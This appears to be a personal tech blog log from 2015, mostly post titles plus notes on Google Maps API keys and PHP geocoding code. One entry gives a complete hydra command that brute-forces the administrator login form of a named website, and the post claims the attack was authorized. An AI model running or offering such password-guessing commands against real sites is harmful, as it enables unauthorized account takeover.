Nothing fancy, just a personal log with a built in search function so I can recall what is easily forgotten.
Monday, September 7, 2015
Malware Removal
Monday, August 17, 2015
Authorized Brute Force Password Attack from 104.175.53.76
hydra -l adminv01 -P pwlist3.txt -s 80 -f www.designer-atelier-antiques.com http-post-form "antiques/administrator/index.php?page=login.php:usrname=^USER^&pass=^PASS^&login-php-submit-button=Login:Incorrect Username"
Sunday, August 9, 2015
Shady Blackmailing Web Master
Meanwhile, I've continued to explore ways of regaining control via the following:
Tuesday, August 4, 2015
Permission to Hack a Site
Saturday, July 11, 2015
Update to Google Maps API Suddenly Exceeding Quota
The key (no pun intended) here is whether you will use a browser key or a server key. Since my PHP script is using file-get-contents($requestURL), where $requestURL might look like this
https://maps.googleapis.com/maps/api/geocode/json?latlng=I will create and copy the server key from the
https://console.developers.google.com/project
Now I am still trying to figure out where to place this code in the PHP/HTML/Javasript page. You'd think that
src="https://maps.googleapis.com/maps/api/js?key=API_KEY">
would work. But not necessarily so. Stay tuned.
Thursday, July 9, 2015
Google Maps API
Last night while testing the features of SpiderOnFire, I found that step 2 Mark stopped working. After adding an echo,I realized that my call to the maps API using the clever key "abcdefg" stopped working after years of service.
A quick visit to google developers console allowed me to properly define a key associated with this project: Widespread Augmented Reality
Get one for yourself be following these steps:
define("MAPS_HOST", "maps.google.com");
define("KEY", "AIzaSyC6Fhp2Q78tcAf3FVmkY--xxxxxxxxx");
.....
$base_url = "http://maps.googleapis.com/maps/api/geocode/json?latlng=" ;
$location = $_POST['latlng'];
$location = substr($location,1,-1);
$location = str_replace(" ","",$location);
$emd_url = "&sensor=false" ;
$request_url = $base_url . $location . $emd_url;
$jsoncontents = file_get_contents($request_url) ;
$decodedjson = json_decode($jsoncontents);
$formattedaddy= $decodedjson->results[0] -> formatted_address;